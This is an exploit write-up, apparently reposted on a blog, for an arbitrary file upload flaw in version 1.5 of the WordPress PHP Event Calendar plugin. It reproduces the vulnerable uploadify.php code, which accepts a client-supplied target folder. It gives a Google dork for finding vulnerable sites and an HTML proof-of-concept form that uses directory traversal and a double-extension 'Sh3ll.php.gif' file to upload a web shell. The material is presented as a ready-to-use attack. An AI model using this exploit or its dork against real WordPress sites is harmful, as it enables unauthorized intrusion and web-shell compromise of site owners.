WordPress PHP Event Calendar 1.5 Arbitrary File Upload




#- Title: WordPress PHP Event Calendar Arbitrary File Upload
#- Author: CrashBandicot
#- Date: 04/02/2015
#- Vendor : phpeventcalendar. com
#- Developer : -
#- Link Download : Wordpress. org/plugins/php-event-calendar/
#- Google Dork: inurl:wp-content/plugins/php-event-calendar/
#- Tested on : MSwin
#- Fixed in Version : > 1.5
=======================================================================

 &- Vulnerability : /wp-content/plugins/php-event-calendar/server/classes/uploadify.php ( "Uploadify.php" )


Bug Code :
<?php
/*
Uploadify
Copyright (c) 2012 Reactive Apps, Ronnie Garcia
Released under the MIT License <http://www.opensource.org/licenses/mit-license.php>
*/
// Define a destination
//$targetFolder = '/uploads'; // Relative to the root
$targetFolder = $_POST['targetFolder']; // wp upload directory
$dir = str_replace('\\','/',dirname(__FILE__));
//$verifyToken = md5('unique_salt' . $_POST['timestamp']);
if (!empty($_FILES)) {
    $tempFile = $_FILES['Filedata']['tmp_name'];
    //$targetPath = $dir.$targetFolder;
    $targetPath = $targetFolder;
    $fileName = $_POST['user_id'].'_'.$_FILES['Filedata']['name'];
    $targetFile = rtrim($targetPath,'/') . '/' . $fileName;
    // Validate the file type
    $fileTypes = array('jpg','jpeg','gif','png'); // File extensions
    $fileParts = pathinfo($_FILES['Filedata']['name']);
    if (in_array($fileParts['extension'],$fileTypes)) {
        move_uploaded_file($tempFile,$targetFile);
        echo '1';
    } else {
        echo 'Invalid file type.';
    }



&- When Vulnerable : *Blank*

Proof Of Concept :

Material : Sh3ll.php.gif (if support) / Upload image.gif


HTML Code : 

<div><form action="http://3xploi7.com/wp-content/plugins/php-event-calendar/server/classes/uploadify.php"  method="post" enctype="multipart/form-data">
 <input type="file" name="Filedata" id="file" ><br>
 <input type="text" name="targetFolder" value="../../../../../" id="file" ><br>
 <input type="text" name="user_id" value="3xploi7" id="file" ><br>
 <input type="submit" name="submit" value="3xploi7ed !" >
</form></div>

Shell Acces ? Here


Saya tidak meminta satu rupiah pun dari anda, Tolong hargai Copyright konten yang ditulis oleh Admin, Jika ingin Copy-Paste tolong sertakan link sumber. Terimakasih :)
Open My Youtube Channel
Previous
Next Post »
Thanks for your comment